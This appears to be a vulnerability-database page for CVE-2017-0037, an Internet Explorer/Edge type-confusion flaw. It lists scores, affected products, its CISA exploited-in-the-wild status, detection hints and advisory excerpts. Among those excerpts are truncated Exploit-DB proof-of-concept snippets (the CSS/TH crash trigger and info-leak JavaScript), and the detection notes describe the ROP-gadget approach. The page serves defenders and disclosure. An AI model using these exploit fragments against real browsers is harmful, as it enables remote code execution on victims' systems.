CVE-2017-0037
published 2017-02-26CVE-2017-0037: Microsoft Internet Explorer 10 and 11 and Microsoft Edge have a type confusion issue in the Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElem…
PriorityP187high8.1CVSS 3.1
AVNACHPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-04-18
Exploited in the wild
EPSS
80.39%
99.6th percentile
Microsoft Internet Explorer 10 and 11 and Microsoft Edge have a type confusion issue in the Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement function in mshtml.dll, which allows remote attackers to execute arbitrary code via vectors involving a crafted Cascading Style Sheets (CSS) token sequence and crafted JavaScript code that operates on a TH element.
Affected
23 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft_corporation | internet_browser | — | — |
| microsoft_corporation | internet_explorer | — | — |
| msrc | internet_explorer_10_on_windows_server_2012 | — | — |
| msrc | internet_explorer_11_on_windows_10_for_32-bit_systems | — | — |
| msrc | internet_explorer_11_on_windows_10_for_x64-based_systems | — | — |
| msrc | internet_explorer_11_on_windows_10_version_1511_for_32-bit_systems | — | — |
| msrc | internet_explorer_11_on_windows_10_version_1511_for_x64-based_systems | — | — |
| msrc | internet_explorer_11_on_windows_10_version_1607_for_32-bit_systems | — | — |
| msrc | internet_explorer_11_on_windows_10_version_1607_for_x64-based_systems | — | — |
| msrc | internet_explorer_11_on_windows_8.1_for_32-bit_systems | — | — |
| msrc | internet_explorer_11_on_windows_8.1_for_x64-based_systems | — | — |
| msrc | internet_explorer_11_on_windows_rt_8.1 | — | — |
| msrc | internet_explorer_11_on_windows_server_2012_r2 | — | — |
| msrc | internet_explorer_11_on_windows_server_2016 | — | — |
| msrc | microsoft_edge_on_windows_10_for_32-bit_systems | — | — |
| msrc | microsoft_edge_on_windows_10_for_x64-based_systems | — | — |
| msrc | microsoft_edge_on_windows_10_version_1511_for_32-bit_systems | — | — |
| msrc | microsoft_edge_on_windows_10_version_1511_for_x64-based_systems | — | — |
| msrc | microsoft_edge_on_windows_10_version_1607_for_32-bit_systems | — | — |
| msrc | microsoft_edge_on_windows_10_version_1607_for_x64-based_systems | — | — |
Detection & IOCsextracted from sources · hover to see the quote
snort↗
SIDs: 41549-41556, 41561-41598, 41601-41602, 41605-41610, 41633-41634, 41763-41764, 41926-41961, 41964-41998
- →Trigger requires a crafted CSS token sequence combining float+column-count on one class, column-span:all on another, and a TH element whose alignment is changed via JavaScript — look for this DOM/CSS pattern in HTML content. ↗
- →The PoC exploit triggers the crash by setting mediaText to a long 'a' string and then changing th1.align to 'right' — monitor for dynamic CSS mediaText manipulation combined with TH element alignment changes in browser script. ↗
- →Exploit uses an iframe appended to a textarea element with an onreadystatechange handler to trigger the type confusion and achieve an info leak — monitor for iframes dynamically appended to textarea elements with readystatechange event handlers. ↗
- →The exploit leverages ROP gadgets exclusively from PROPSYS.dll to bypass DEP/ASLR — presence of PROPSYS.dll ROP chains (e.g., XCHG EAX,ESP gadget at offset 0x0b473) in heap spray content is a strong indicator of this exploit. ↗
- →CVE-2017-0037 is shared between Internet Explorer and Edge (MS17-007 / MS17-006) and was publicly disclosed before patching — prioritize detection on unpatched IE 10/11 and Edge systems. ↗
- ·Snort SID ranges listed cover the entire March 2017 Patch Tuesday bulletin set (MS17-006 through MS17-023), not exclusively CVE-2017-0037 — individual SID-to-CVE mapping requires consulting Snort.org or the Talos Management Center. ↗
- ·The ROP gadget addresses (e.g., base_leaked_addr + 0x0b473 for XCHG EAX,ESP in PROPSYS.dll) are ASLR-relative and will vary per system; the exploit performs an info leak first to compute the base address dynamically. ↗
- ·The exploit PoC targets 32-bit IE tab processes; the Edge crash path differs slightly ('Edge should crash when reading the same address while 32-bit IE tab process should crash in the same place but when reading a lower address'). ↗
CVSS provenance
nvdv3.18.1HIGHCVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.6HIGHAV:N/AC:H/Au:N/C:C/I:C/A:C
vulncheck8.1HIGH
cisa8.1HIGH
vendor_msrc6.4MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Microsoft Edge and Internet Explorer Type Confusion Vulnerability
cisa·2022-03-28·CVSS 8.1
CVE-2017-0037 [HIGH] CWE-704 Microsoft Edge and Internet Explorer Type Confusion Vulnerability
Vulnerability: Microsoft Edge and Internet Explorer Type Confusion Vulnerability
Affected: Microsoft Edge and Internet Explorer
Microsoft Edge and Internet Explorer have a type confusion vulnerability in mshtml.dll, which allows remote code execution.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2017-0037
Remediation Due Date: 2022-04-18
Microsoft
Microsoft Browser Memory Corruption Vulnerability
vendor_msrc·2017-03-14·CVSS 6.4
CVE-2017-0037 [HIGH] Microsoft Browser Memory Corruption Vulnerability
Microsoft Browser Memory Corruption Vulnerability
Description: A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory. The vulnerability could corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, the attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
An attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft browsers, and then convince
GHSA
GHSA-8xx2-2w6g-2ff2: Microsoft Internet Explorer 10 and 11 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted
ghsa_unreviewed·2022-05-17·CVSS 8.1
CVE-2017-0018 [HIGH] CWE-119 GHSA-8xx2-2w6g-2ff2: Microsoft Internet Explorer 10 and 11 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted
Microsoft Internet Explorer 10 and 11 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability." This vulnerability is different from those described in CVE-2017-0037 and CVE-2017-0149.
GHSA
GHSA-xpg5-jv85-754h: Microsoft Internet Explorer 10 and 11 and Microsoft Edge have a type confusion issue in the Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSp
ghsa_unreviewed·2022-05-17
CVE-2017-0037 [HIGH] CWE-704 GHSA-xpg5-jv85-754h: Microsoft Internet Explorer 10 and 11 and Microsoft Edge have a type confusion issue in the Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSp
Microsoft Internet Explorer 10 and 11 and Microsoft Edge have a type confusion issue in the Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement function in mshtml.dll, which allows remote attackers to execute arbitrary code via vectors involving a crafted Cascading Style Sheets (CSS) token sequence and crafted JavaScript code that operates on a TH element.
GHSA
GHSA-vrcm-c43w-vj64: The VBScript engine in Microsoft Internet Explorer 11 allows remote attackers to obtain sensitive information from process memory via a crafted web si
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2017-0049 [HIGH] CWE-200 GHSA-vrcm-c43w-vj64: The VBScript engine in Microsoft Internet Explorer 11 allows remote attackers to obtain sensitive information from process memory via a crafted web si
The VBScript engine in Microsoft Internet Explorer 11 allows remote attackers to obtain sensitive information from process memory via a crafted web site, aka "Scripting Engine Information Disclosure Vulnerability." This vulnerability is different from those described in CVE-2017-0018, and CVE-2017-0037.
GHSA
GHSA-xqqj-2hmg-wc6r: Microsoft Internet Explorer 9 through 11 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craft
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2017-0149 [HIGH] CWE-119 GHSA-xqqj-2hmg-wc6r: Microsoft Internet Explorer 9 through 11 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craft
Microsoft Internet Explorer 9 through 11 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability." This vulnerability is different from those described in CVE-2017-0018 and CVE-2017-0037.
VulnCheck
Microsoft Edge and Internet Explorer Type Confusion Vulnerability
vulncheck·2017·CVSS 8.1
CVE-2017-0037 [HIGH] CWE-704 Microsoft Edge and Internet Explorer Type Confusion Vulnerability
Microsoft Edge and Internet Explorer Type Confusion Vulnerability
Microsoft Edge and Internet Explorer have a type confusion vulnerability in mshtml.dll, which allows remote code execution.
Affected: Microsoft Edge and Internet Explorer
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.threatstop.com/blog/bi-weekly-security-update-8/18/2017-0; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
Remediation Due: 2022-04-18
No detection rules found.
Exploit-DB
Microsoft Internet Explorer 11 (Windows 7 x86) - 'mshtml.dll' Remote Code Execution (MS17-007)
exploitdb·2017-10-17
CVE-2017-0059 Microsoft Internet Explorer 11 (Windows 7 x86) - 'mshtml.dll' Remote Code Execution (MS17-007)
Microsoft Internet Explorer 11 (Windows 7 x86) - 'mshtml.dll' Remote Code Execution (MS17-007)
---
.class1 { float: left; column-count: 5; }
.class2 { column-span: all; columns: 1px; }
table {border-spacing: 0px;}
var ntdllBase = "";
function infoleak() {
var textarea = document.getElementById("textarea");
var frame = document.createElement("iframe");
textarea.appendChild(frame);
frame.contentDocument.onreadystatechange = eventhandler;
form.reset();
}
function eventhandler() {
document.getElementById("textarea").defaultValue = "foo";
// Object replaced here
// one of the side allocations of the audio element
var j = document.createElement("canvas");
ctx=j.getContext("2d");
ctx.beginPath();
ctx.moveTo(20,20);
ctx.lineTo(20,100);
ctx.lineTo(70,100);
ctx.strokeStyle="red";
ctx.strok
Exploit-DB
Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)
exploitdb·2017-07-24
CVE-2017-0059 Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)
Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)
---
.class1 { float: left; column-count: 5; }
.class2 { column-span: all; columns: 1px; }
table {border-spacing: 0px;}
var base_leaked_addr = "";
function infoleak() {
var textarea = document.getElementById("textarea");
var frame = document.createElement("iframe");
textarea.appendChild(frame);
frame.contentDocument.onreadystatechange = eventhandler;
form.reset();
}
function eventhandler() {
document.getElementById("textarea").defaultValue = "foo";
// Object replaced here
// one of the side allocations of the audio element
var audioElm = document.createElement("audio");
audioElm.src = "test.mp3";
}
function writeu(base, offs) {
var res = 0;
if (base != 0) { res = base + offs }
else { res = offs }
re
Exploit-DB
Microsoft Edge / Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion
exploitdb·2017-02-24
CVE-2017-0037 Microsoft Edge / Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion
Microsoft Edge / Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion
---
.class1 { float: left; column-count: 5; }
.class2 { column-span: all; columns: 1px; }
table {border-spacing: 0px;}
function boom() {
document.styleSheets[0].media.mediaText = "aaaaaaaaaaaaaaaaaaaa";
th1.align = "right";
}
'::`7'::`dynamic atexit destructor for 'fieldDefaultValue''+0x641fc
00000071`0e75ba50 00007ffe`8f05393f MSHTML!Layout::FlowBoxBuilder::MoveToNextPosition+0x1b5
00000071`0e75bb10 00007ffe`8f0537e9 MSHTML!Layout::LayoutBuilder::EnterBlock+0x147
00000071`0e75bbb0 00007ffe`8f278243 MSHTML!Layout::LayoutBuilder::Move+0x77
00000071`0e75bbe0 00007ffe`8e9b364f MSHTML!Layout::LayoutBuilderDriver::BuildPageLayout+0x19d
00000071`0e75bcc0 00007ffe`8e9b239c MSHTML!Layout::PageColl
Zscaler
Top Exploit Kit Activity Roundup - Summer 2017 | Zscaler
blogs_zscaler·2017-09-12
Top Exploit Kit Activity Roundup - Summer 2017 | Zscaler
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Krebs
Adobe, Microsoft Push Critical Security Fixes
blogs_krebs·2017-03-14·CVSS 8.1
[HIGH] Adobe, Microsoft Push Critical Security Fixes
Adobe and Microsoft each pushed out security updates for their products today. Adobe plugged at least seven security holes in its Flash Player software. Microsoft, which delayed last month’s Patch Tuesday until today, issued an unusually large number of update bundles (18) to fix dozens of flaws in Windows and associated software.
Another critical patch (MS17-013) covers a slew of dangerous vulnerabilities in the way Windows handles certain image files. Malware or miscreants could exploit the flaws to foist malicious software without any action on the part the user, aside from perhaps just browsing to a hacked or booby-trapped Web site.
According to a blog post at the SANS Internet Storm Center, the image-handling flaw is one of six bulletins Microsoft released today which include vulner
Qualys
Massive Microsoft Patch Tuesday Security Update for March
blogs_qualys·2017-03-14·CVSS 7.8
[HIGH] Massive Microsoft Patch Tuesday Security Update for March
Today Microsoft released a massive Patch Tuesday security update consisting of 17 security bulletins that fixed a total of 134 vulnerabilities. Out of the 17 security bulletins 8 were marked as Critical which could lead to remote code execution while the remaining were marked as Important. Since there were no patches released for February, in one way, a massive update was expected this month. We also liked the fact that Microsoft kept the older way of clubbing KB articles and patches in security bulletins which, in our opinion, is easy to read and provides better overall picture. But the Microsoft blog here , allude that sometime in the future Microsoft will stop publishing security bulletins.
The highest priority overall goes to the Windows GDI bulletin MS17-013 which could allow remote
Qualys
Massive Microsoft Patch Tuesday Security Update for March | Qualys
blogs_qualys·2017-03-14·CVSS 7.8
[HIGH] Massive Microsoft Patch Tuesday Security Update for March | Qualys
Today Microsoft released a massive Patch Tuesday security update consisting of 17 security bulletins that fixed a total of 134 vulnerabilities. Out of the 17 security bulletins 8 were marked as Critical which could lead to remote code execution while the remaining were marked as Important. Since there were no patches released for February, in one way, a massive update was expected this month. We also liked the fact that Microsoft kept the older way of clubbing KB articles and patches in security bulletins which, in our opinion, is easy to read and provides better overall picture. But the Microsoft blog here, allude that sometime in the future Microsoft will stop publishing security bulletins.
The highest priority overall goes to the Windows GDI bulletin MS17-013 which could allow remote c
Talos
Microsoft Patch Tuesday - March 2017
blogs_talos·2017-03-14·CVSS 4.3
[MEDIUM] Microsoft Patch Tuesday - March 2017
Following a sparse February patch Tuesday, today’s March release brings a bumper crop of fixed vulnerabilities: 17 bulletins covering 140 different vulnerabilities, 47 of which are rated as critical. The critical vulnerabilities affect Internet Explorer, Edge, Hyper-V, Windows PDF Library, Microsoft SMB Server, Uniscribe, Microsoft Graphics Component, Adobe Flash Player and Microsoft Windows. 92 vulnerabilities are rated as important, additionally affecting Active Directory Federation Services, DirectShow, Internet Information Services, Microsoft Exchange Server, Microsoft Office, Microsoft XML Core Services, Windows DVD Maker, Windows Kernel, Windows Kernel-Mode Drivers.
### Bulletins Rated Critical MS17-006, MS17-007, MS17-008, MS17-009, MS17-010, MS17-011, MS17-012, MS17-013 and MS17-0
Talos
Microsoft Patch Tuesday - March 2017
blogs_talos·2017-03-14·CVSS 4.3
[MEDIUM] Microsoft Patch Tuesday - March 2017
## Microsoft Patch Tuesday - March 2017
Following a sparse February patch Tuesday, today’s March release brings a bumper crop of fixed vulnerabilities: 17 bulletins covering 140 different vulnerabilities, 47 of which are rated as critical. The critical vulnerabilities affect Internet Explorer, Edge, Hyper-V, Windows PDF Library, Microsoft SMB Server, Uniscribe, Microsoft Graphics Component, Adobe Flash Player and Microsoft Windows. 92 vulnerabilities are rated as important, additionally affecting Active Directory Federation Services, DirectShow, Internet Information Services, Microsoft Exchange Server, Microsoft Office, Microsoft XML Core Services, Windows DVD Maker, Windows Kernel, Windows Kernel-Mode Drivers.
## Bulletins Rated Critical MS17-006, MS17-007, MS17-008, MS17-009, MS17-010,
Krebs
Adobe, Microsoft Push Critical Security Fixes – Krebs on Security
blogs_krebs·2017-03-01·CVSS 8.1
[HIGH] Adobe, Microsoft Push Critical Security Fixes – Krebs on Security
Adobe and Microsoft each pushed out security updates for their products today. Adobe plugged at least seven security holes in its Flash Player software. Microsoft, which delayed last month’s Patch Tuesday until today, issued an unusually large number of update bundles (18) to fix dozens of flaws in Windows and associated software.
Microsoft’s patch to fix at least five critical bugs in the Windows file-sharing service is bound to make a great deal of companies nervous before they get around to deploying this week’s patches. Most organizations block internal file-sharing networks from talking directly to their Internet-facing networks, but these flaws could be exploited by a malicious computer worm to spread very quickly once inside an organization with a great many unpatched Windows syste
Zscaler
Zscaler found Multiple Security Vulnerabilities | 03-14-2017
blogs_zscaler
Zscaler found Multiple Security Vulnerabilities | 03-14-2017
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
http://www.securityfocus.com/bid/96088http://www.securitytracker.com/id/1037905http://www.securitytracker.com/id/1037906https://0patch.blogspot.si/2017/03/0patching-another-0-day-internet.htmlhttps://bugs.chromium.org/p/project-zero/issues/detail?id=1011https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0037https://www.exploit-db.com/exploits/41454/https://www.exploit-db.com/exploits/42354/https://www.exploit-db.com/exploits/43125/http://www.securityfocus.com/bid/96088http://www.securitytracker.com/id/1037905http://www.securitytracker.com/id/1037906https://0patch.blogspot.si/2017/03/0patching-another-0-day-internet.htmlhttps://bugs.chromium.org/p/project-zero/issues/detail?id=1011https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0037https://www.exploit-db.com/exploits/41454/https://www.exploit-db.com/exploits/42354/https://www.exploit-db.com/exploits/43125/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2017-0037
2017-02-26
Published
2022-03-28
Added to CISA KEV
Exploited in the wild